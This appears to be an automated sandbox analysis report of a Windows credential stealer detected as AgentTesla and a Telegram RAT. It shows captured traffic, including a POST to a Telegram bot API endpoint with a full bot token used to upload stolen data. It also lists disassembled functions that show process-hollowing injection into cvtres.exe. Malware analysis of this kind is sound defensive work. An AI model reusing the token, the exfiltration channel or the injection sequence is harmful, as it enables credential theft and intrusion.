                                                        2024-10-30 15:26:59 UTC10892OUTData Raw: 5e b6 17 f8 31 fe ba 9f 37 98 7f bc cb e5 f9 21 28 a5 a4 ae 93 88 5a a0 97 3f 63 d7 a2 b9 cf 11 48 8c 7e 9c 67 f4 ab f5 4a e6 cb cd 95 a5 f3 31 9e d8 a8 95 ac ee 75 61 26 a1 52 ec ea 2f 75 5b 1b 5d 7f 4d 8e de e6 17 b6 2f 2b cc ca e0 ae 64 27 a9 e9 c5 60 78 b2 e2 de 4d 42 0b 6b 39 16 4b 6b 58 16 24 64 60 c0 fe 23 f0 fc ab 5f fe 10 2f fa 89 ff 00 e4 0f fe ca 94 78 08 64 67 53 24 77 c4 1f fd 95 70 42 a5 08 34 f9 b6 3d f9 46 ac 95 ac 6f 5e 9b d1 74 fe 4a ea 45 38 c7 93 f6 6d 9d 3b 6f f9 bf 3a 93 4e 37 66 76 f3 d6 fc 2e de 3e d1 e4 6d ce 47 fc f3 e7 3f a5 68 d1 5e 7f 3e 96 b1 d7 cb ad cf 36 5f ba 3e 94 b4 8b f7 47 d2 96 bd f8 7c 28 f8 ea 9f 1b f5 0a 28 a2 ac 80 ae 93 c1 7f f2 0d ba ff 00 af a7 fe 4b 5c dd 74 9e 0b ff 00 90 6d d7 fd 7d 3f f2 5a f2 f3 1f b1 f3
                                                        Data Ascii: ^17!(Z?cH~gJ1ua&R/u[]M/+d'`xMBk9KkX$d`#_/xdgS$wpB4=Fo^tJE8m;o:N7fv.>mG?h^>6_>G|((K\tm}?Z
                                                        2024-10-30 15:26:59 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 62 61 34 31 64 38 34 61 36 65 30 2d 2d 0d 0a
                                                        Data Ascii: -----------------------------8dd5ba41d84a6e0--
                                                        2024-10-30 15:27:00 UTC402INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 30 Oct 2024 15:27:00 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 56
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        {"ok":false,"error_code":400,"description":"Logged out"}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192.168.2.450023149.154.167.220443
                                                        TimestampBytes transferredDirectionData
                                                        2024-10-30 15:27:09 UTC262OUTPOST /bot7141101422:AAHWm4uo7ZyvbT3-ERU62IF6HA54iYXM-NI/sendDocument HTTP/1.1
                                                        Content-Type: multipart/form-data; boundary=---------------------------8dcf8d5c9f72391
                                                        Host: api.telegram.org
                                                        Content-Length: 76466
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        2024-10-30 15:27:10 UTC25INHTTP/1.1 100 Continue


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:11:23:01
                                                        Start date:30/10/2024
                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe"
                                                        Imagebase:0x90000
                                                        File size:860'672 bytes
                                                        MD5 hash:34F978912D45CE5DF9309990ECFB0232
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1702812178.0000000003561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:1
                                                        Start time:11:23:01
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CvtRes.exe"
                                                        Imagebase:0x900000
                                                        File size:46'832 bytes
                                                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:11:23:01
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CvtRes.exe"
                                                        Imagebase:0x900000
                                                        File size:46'832 bytes
                                                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4151053651.00000000030D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4151053651.00000000030D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4149885422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:19.6%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:6.7%
                                                          Total number of Nodes:60
                                                          Total number of Limit Nodes:0
                                                          execution_graph 2887 98b45a 2888 98b460 2887->2888 2892 989e08 2888->2892 2896 989e01 2888->2896 2889 98b4c3 2893 989e54 WriteProcessMemory 2892->2893 2895 989eed 2893->2895 2895->2889 2897 989e07 WriteProcessMemory 2896->2897 2899 989eed 2897->2899 2899->2889 2907 98b6ad 2911 989498 2907->2911 2915 9894a0 2907->2915 2908 98b6c2 2912 9894a0 ResumeThread 2911->2912 2914 989530 2912->2914 2914->2908 2916 9894e4 ResumeThread 2915->2916 2918 989530 2916->2918 2918->2908 2900 98b25f 2903 98a190 2900->2903 2904 98a217 CreateProcessA 2903->2904 2906 98a46c 2904->2906 2906->2906 2919 98adef 2923 989bc0 2919->2923 2927 989b70 2919->2927 2920 98ae09 2924 989c09 Wow64SetThreadContext 2923->2924 2926 989c81 2924->2926 2926->2920 2928 989b78 Wow64SetThreadContext 2927->2928 2930 989c81 2928->2930 2930->2920 2969 98b750 2970 98b753 2969->2970 2972 989f58 ReadProcessMemory 2970->2972 2973 989f60 ReadProcessMemory 2970->2973 2971 98b7e5 2972->2971 2973->2971 2931 98a943 2933 989e08 WriteProcessMemory 2931->2933 2934 989e01 WriteProcessMemory 2931->2934 2932 98a967 2933->2932 2934->2932 2935 98b544 2936 98b54b 2935->2936 2938 989e08 WriteProcessMemory 2936->2938 2939 989e01 WriteProcessMemory 2936->2939 2937 98b569 2938->2937 2939->2937 2940 98a825 2942 989bc0 Wow64SetThreadContext 2940->2942 2943 989b70 Wow64SetThreadContext 2940->2943 2941 98a69a 2942->2941 2943->2941 2944 98b7a7 2945 98b7ad 2944->2945 2949 989f58 2945->2949 2953 989f60 2945->2953 2946 98b7e5 2950 989f5f ReadProcessMemory 2949->2950 2952 98a024 2950->2952 2952->2946 2954 989fac ReadProcessMemory 2953->2954 2956 98a024 2954->2956 2956->2946 2957 98b5c7 2960 989ce8 2957->2960 2961 989d2c VirtualAllocEx 2960->2961 2963 989da4 2961->2963

                                                          Executed Functions

                                                          Function 00982414 Relevance: 4.0, Strings: 3, Instructions: 290COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 241 982414-9824cb 243 9824cd 241->243 244 9824d2-98253a call 9801c8 241->244 243->244 250 98253d 244->250 251 982544-982560 250->251 252 982569-98256a 251->252 253 982562 251->253 256 982770-9827ee call 9801d8 252->256 253->250 253->252 254 9826f9-98270b 253->254 255 98261c-982624 call 982dd0 253->255 253->256 257 982750-98276b 253->257 258 982710-98272f 253->258 259 982734-98274b 253->259 260 982675-9826a9 253->260 261 9825d5-9825e7 253->261 262 9825ec-9825f0 253->262 263 9826ae-9826c6 253->263 264 98256f-9825a3 253->264 265 982641-982670 253->265 266 9825a5-9825a9 253->266 254->251 273 98262a-98263c 255->273 289 9827f0 call 98387c 256->289 290 9827f0 call 983ac0 256->290 291 9827f0 call 983791 256->291 257->251 258->251 259->251 260->251 261->251 269 9825f2-982601 262->269 270 982603-98260a 262->270 281 9826c8-9826d7 263->281 282 9826d9-9826e0 263->282 264->251 265->251 267 9825ab-9825ba 266->267 268 9825bc-9825c3 266->268 279 9825ca-9825d0 267->279 268->279 271 982611-982617 269->271 270->271 271->251 273->251 279->251 283 9826e7-9826f4 281->283 282->283 283->251 288 9827f6-982800 289->288 290->288 291->288
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tecq$Tecq$[s
                                                          • API String ID: 0-2110192138
                                                          • Opcode ID: 24c40e3ffaaaa66aaa8b86047ade1d414dec6ef46ddea2ac67f457da4e3f877c
                                                          • Instruction ID: 5028b94f58af212c6ea4a2ec16fe2eb8ecb60ff85e326195ebfd5df06fdd4f41
                                                          • Opcode Fuzzy Hash: 24c40e3ffaaaa66aaa8b86047ade1d414dec6ef46ddea2ac67f457da4e3f877c
                                                          • Instruction Fuzzy Hash: 0CC146B4E093498FCB08CFA9C8945AEBBF2FF89300F24846AD405AB365D7399905CF54
                                                          Function 009824A8 Relevance: 4.0, Strings: 3, Instructions: 251COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 293 9824a8-9824cb 294 9824cd 293->294 295 9824d2-98253a call 9801c8 293->295 294->295 301 98253d 295->301 302 982544-982560 301->302 303 982569-98256a 302->303 304 982562 302->304 307 982770-9827ee call 9801d8 303->307 304->301 304->303 305 9826f9-98270b 304->305 306 98261c-982624 call 982dd0 304->306 304->307 308 982750-98276b 304->308 309 982710-98272f 304->309 310 982734-98274b 304->310 311 982675-9826a9 304->311 312 9825d5-9825e7 304->312 313 9825ec-9825f0 304->313 314 9826ae-9826c6 304->314 315 98256f-9825a3 304->315 316 982641-982670 304->316 317 9825a5-9825a9 304->317 305->302 324 98262a-98263c 306->324 341 9827f0 call 98387c 307->341 342 9827f0 call 983ac0 307->342 343 9827f0 call 983791 307->343 308->302 309->302 310->302 311->302 312->302 320 9825f2-982601 313->320 321 982603-98260a 313->321 332 9826c8-9826d7 314->332 333 9826d9-9826e0 314->333 315->302 316->302 318 9825ab-9825ba 317->318 319 9825bc-9825c3 317->319 330 9825ca-9825d0 318->330 319->330 322 982611-982617 320->322 321->322 322->302 324->302 330->302 334 9826e7-9826f4 332->334 333->334 334->302 339 9827f6-982800 341->339 342->339 343->339
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Tecq$Tecq$[s
                                                          • API String ID: 0-2110192138
                                                          • Opcode ID: 8eb17490288240b91aaf1f5eeb4ed47b50606bd0b9539fe8bd812028b0a16493
                                                          • Instruction ID: d5068aa0fdf9f9dee048e58143b7dcbe0a6e210ad1f9156c9bc147024a16f048
                                                          • Opcode Fuzzy Hash: 8eb17490288240b91aaf1f5eeb4ed47b50606bd0b9539fe8bd812028b0a16493
                                                          • Instruction Fuzzy Hash: 67B1C2B4E052198FDB08DFAAC9949AEBBF2FF89300F208529E405AB365D7359905CF54
                                                          Function 00980A88 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 344 980a88-980aa9 345 980aab 344->345 346 980ab0-980b05 call 981b67 344->346 345->346 347 980b0b-980b36 346->347 349 980b38 347->349 350 980b3f-981859 347->350 349->350
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ?$@
                                                          • API String ID: 0-1463999369
                                                          • Opcode ID: 9ed823f81586b6c29da0e2ef1e25f07ebe644eb8e2f9a79455190c32cb4448bb
                                                          • Instruction ID: 213a573e8399222864eb10edd3ae089d82484c8b07184df91ac780a72f1178bf
                                                          • Opcode Fuzzy Hash: 9ed823f81586b6c29da0e2ef1e25f07ebe644eb8e2f9a79455190c32cb4448bb
                                                          • Instruction Fuzzy Hash: D221A4B1E006199BEB18DF6B98446DEFAF7AFC9301F14C07AD918A6224EB3405568F54
                                                          Function 00984650 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: SJk
                                                          • API String ID: 0-3800963956
                                                          • Opcode ID: d977c16c8116f38e12c8a85effbc81324cff12df22394fa4b849a680b00dbed6
                                                          • Instruction ID: 3365e7963e8156eabc0aaa8666c5bcf5be5cbf47fb575e5a782e46afacc34519
                                                          • Opcode Fuzzy Hash: d977c16c8116f38e12c8a85effbc81324cff12df22394fa4b849a680b00dbed6
                                                          • Instruction Fuzzy Hash: 44D13870E0160ADFCB04DFA9D5808AEFBB2FF8A301B65D559D415AB314D738A982CF94
                                                          Function 0098A825 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ys
                                                          • API String ID: 0-3552605861
                                                          • Opcode ID: 74fb78ed8706968474898eb1bffad978e9f35186558c87f3e7d77580f4545366
                                                          • Instruction ID: 2e75cd7737d23a0e83e294505f0bd0a064e85f569970f85846b75a1940a2661a
                                                          • Opcode Fuzzy Hash: 74fb78ed8706968474898eb1bffad978e9f35186558c87f3e7d77580f4545366
                                                          • Instruction Fuzzy Hash: B651F571D1466ACBDB64CF65C840B99B7B2BF99300F24D9EAD10EA3214EB349AC59F40
                                                          Function 00982DD0 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a9a1c346693cf456b0dcbda9356a55add177b0f6f123b5e937c81471bcaed865
                                                          • Instruction ID: c0eb9014c648018bec23ee488618f45b1f1560820a1e7e2e4193675c7e39e4c6
                                                          • Opcode Fuzzy Hash: a9a1c346693cf456b0dcbda9356a55add177b0f6f123b5e937c81471bcaed865
                                                          • Instruction Fuzzy Hash: AF512B70E0460A8FDB08DFAAC4506AEFBF2FB88311F24D46AD519A7365D7349A41CF58
                                                          Function 00983791 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 33bdbc3d681dbe8db52645ddd919f02c00899aa93f8a698ae1c7e9cbcd0365c8
                                                          • Instruction ID: 3a64067324645955b99bd78dae2ff2cb53f69d43bb7895453523ddf4a9871acf
                                                          • Opcode Fuzzy Hash: 33bdbc3d681dbe8db52645ddd919f02c00899aa93f8a698ae1c7e9cbcd0365c8
                                                          • Instruction Fuzzy Hash: C33127B1E046188BDB18CFAAD8447DEBBB3AFC8310F14C16AD409AB364DB755A45CF90
                                                          Function 0098A190 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 321processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 177 98a190-98a229 179 98a22b-98a242 177->179 180 98a272-98a29a 177->180 179->180 185 98a244-98a249 179->185 183 98a29c-98a2b0 180->183 184 98a2e0-98a336 180->184 183->184 192 98a2b2-98a2b7 183->192 194 98a338-98a34c 184->194 195 98a37c-98a46a CreateProcessA 184->195 186 98a24b-98a255 185->186 187 98a26c-98a26f 185->187 189 98a259-98a268 186->189 190 98a257 186->190 187->180 189->189 193 98a26a 189->193 190->189 196 98a2b9-98a2c3 192->196 197 98a2da-98a2dd 192->197 193->187 194->195 203 98a34e-98a353 194->203 213 98a46c-98a472 195->213 214 98a473-98a558 195->214 198 98a2c5 196->198 199 98a2c7-98a2d6 196->199 197->184 198->199 199->199 202 98a2d8 199->202 202->197 204 98a355-98a35f 203->204 205 98a376-98a379 203->205 207 98a361 204->207 208 98a363-98a372 204->208 205->195 207->208 208->208 209 98a374 208->209 209->205 213->214 226 98a568-98a56c 214->226 227 98a55a-98a55e 214->227 229 98a57c-98a580 226->229 230 98a56e-98a572 226->230 227->226 228 98a560 227->228 228->226 232 98a590-98a594 229->232 233 98a582-98a586 229->233 230->229 231 98a574 230->231 231->229 235 98a5ca-98a5d5 232->235 236 98a596-98a5bf 232->236 233->232 234 98a588 233->234 234->232 240 98a5d6 235->240 236->235 240->240
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0098A457
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: ys$ys$ys
                                                          • API String ID: 963392458-1447962759
                                                          • Opcode ID: 4d4dcef08d92a0591599f13760610fc4a59ab6ad62296f8f2a044803770330cf
                                                          • Instruction ID: 18589c7945ff5e0e4cb5b1a4300b09255980d0c0f2b28a22253711763f022c84
                                                          • Opcode Fuzzy Hash: 4d4dcef08d92a0591599f13760610fc4a59ab6ad62296f8f2a044803770330cf
                                                          • Instruction Fuzzy Hash: 28C107B0D002198FDB24DFA8C845BEDBBB5BF49310F0095AAE819B7250DB749E85CF95
                                                          Function 00989E01 Relevance: 1.6, APIs: 1, Instructions: 134injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 353 989e01-989e4d 355 989e52-989e53 353->355 356 989e88-989e89 355->356 357 989e54-989e73 355->357 356->355 358 989e8a-989eeb WriteProcessMemory 356->358 357->358 359 989e75-989e87 357->359 361 989eed-989ef3 358->361 362 989ef4-989f46 358->362 359->358 361->362
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00989EDB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 587b38f147f26f227d688b9d325a64df76e67ae86abfb5b76824faf5cffcb47d
                                                          • Instruction ID: 67b1201a89fc7b2d8358b25956bf229ca1da0b48647a47fb1caa0faf979afb33
                                                          • Opcode Fuzzy Hash: 587b38f147f26f227d688b9d325a64df76e67ae86abfb5b76824faf5cffcb47d
                                                          • Instruction Fuzzy Hash: B751DDB5D012489FCB10DFA9D884AEEFFF1AB4A310F24902AE455BB351D734AA45CB54
                                                          Function 00989B70 Relevance: 1.6, APIs: 1, Instructions: 129threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 367 989b70-989c20 372 989c22-989c34 367->372 373 989c37-989c7f Wow64SetThreadContext 367->373 372->373 375 989c88-989cd4 373->375 376 989c81-989c87 373->376 376->375
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00989C6F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: b502d59a852ecda4e1d62383f6c12bef24ffc8bff9b865b6b9aed47027aabc77
                                                          • Instruction ID: 6a7e8519d2c246243eaba502354e1b3ef1649985cbe20c9b57d804609121dd77
                                                          • Opcode Fuzzy Hash: b502d59a852ecda4e1d62383f6c12bef24ffc8bff9b865b6b9aed47027aabc77
                                                          • Instruction Fuzzy Hash: D54124B4D052889FCB11DFA9D885AEEBFF0AF49310F18806AE458BB241D739594ACB54
                                                          Function 00989E08 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 381 989e08-989e73 383 989e8a-989eeb WriteProcessMemory 381->383 384 989e75-989e87 381->384 386 989eed-989ef3 383->386 387 989ef4-989f46 383->387 384->383 386->387
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00989EDB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: de18b9cee084c47db15cda24334ddc47b4070f89874dcbc2e03eeb3df2bbd04e
                                                          • Instruction ID: c5cf7951c601c4a86532c9a1229df82efe4847786ffa074c848ebe74cfb6c9a1
                                                          • Opcode Fuzzy Hash: de18b9cee084c47db15cda24334ddc47b4070f89874dcbc2e03eeb3df2bbd04e
                                                          • Instruction Fuzzy Hash: AC41ABB5D012589FCF00DFA9D984AEEFBF1BB49310F24942AE818B7240D734AA45CF54
                                                          Function 00989F58 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 392 989f58-989f5d 393 989f5f-989fd1 392->393 394 989fd2-98a022 ReadProcessMemory 392->394 393->394 397 98a02b-98a07d 394->397 398 98a024-98a02a 394->398 398->397
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0098A012
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: b7255a1635802b09c95443232a9d09cd6d9f03e620f18a4015102389f7aa50a7
                                                          • Instruction ID: 3d21f690ba6ac5b4d9074d16cf29408b114ec1b100c9d59f7b8a5a744caa5897
                                                          • Opcode Fuzzy Hash: b7255a1635802b09c95443232a9d09cd6d9f03e620f18a4015102389f7aa50a7
                                                          • Instruction Fuzzy Hash: E541CAB5D002589FCF10DFA9D880AEEFBB1BB09310F20902AE815B7340C739A945CF64
                                                          Function 00989F60 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 403 989f60-98a022 ReadProcessMemory 407 98a02b-98a07d 403->407 408 98a024-98a02a 403->408 408->407
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0098A012
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 0e8d4bfeee7299c5ffe3679e8c86987f2958f23d1b2bf0fec3e1f0811121dd5e
                                                          • Instruction ID: 16f36d209217d910a85115743fd075968922a3138ae715d4d50894457802a67c
                                                          • Opcode Fuzzy Hash: 0e8d4bfeee7299c5ffe3679e8c86987f2958f23d1b2bf0fec3e1f0811121dd5e
                                                          • Instruction Fuzzy Hash: 4641A8B5D00258DFCF10DFAAD884AEEFBB1BB4A310F10942AE819B7240C735A945CF64
                                                          Function 00989CE8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 413 989ce8-989da2 VirtualAllocEx 416 989dab-989df5 413->416 417 989da4-989daa 413->417 417->416
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00989D92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 71d0901811db103721ac4a633977a4029138e8c44c8998ca5998a1d8775ea103
                                                          • Instruction ID: 00d3bd8d9d4b7e762b1a3cf397201e0d97fe9da89dc34e0c4c7268edaf73eb33
                                                          • Opcode Fuzzy Hash: 71d0901811db103721ac4a633977a4029138e8c44c8998ca5998a1d8775ea103
                                                          • Instruction Fuzzy Hash: 1231A9B4D002589FCF10DFA9D984ADEFBB5BB49310F10942AE815B7340D735A905CF58
                                                          Function 00989BC0 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 422 989bc0-989c20 424 989c22-989c34 422->424 425 989c37-989c7f Wow64SetThreadContext 422->425 424->425 427 989c88-989cd4 425->427 428 989c81-989c87 425->428 428->427
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 00989C6F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1702297928.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_980000_SecuriteInfo.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
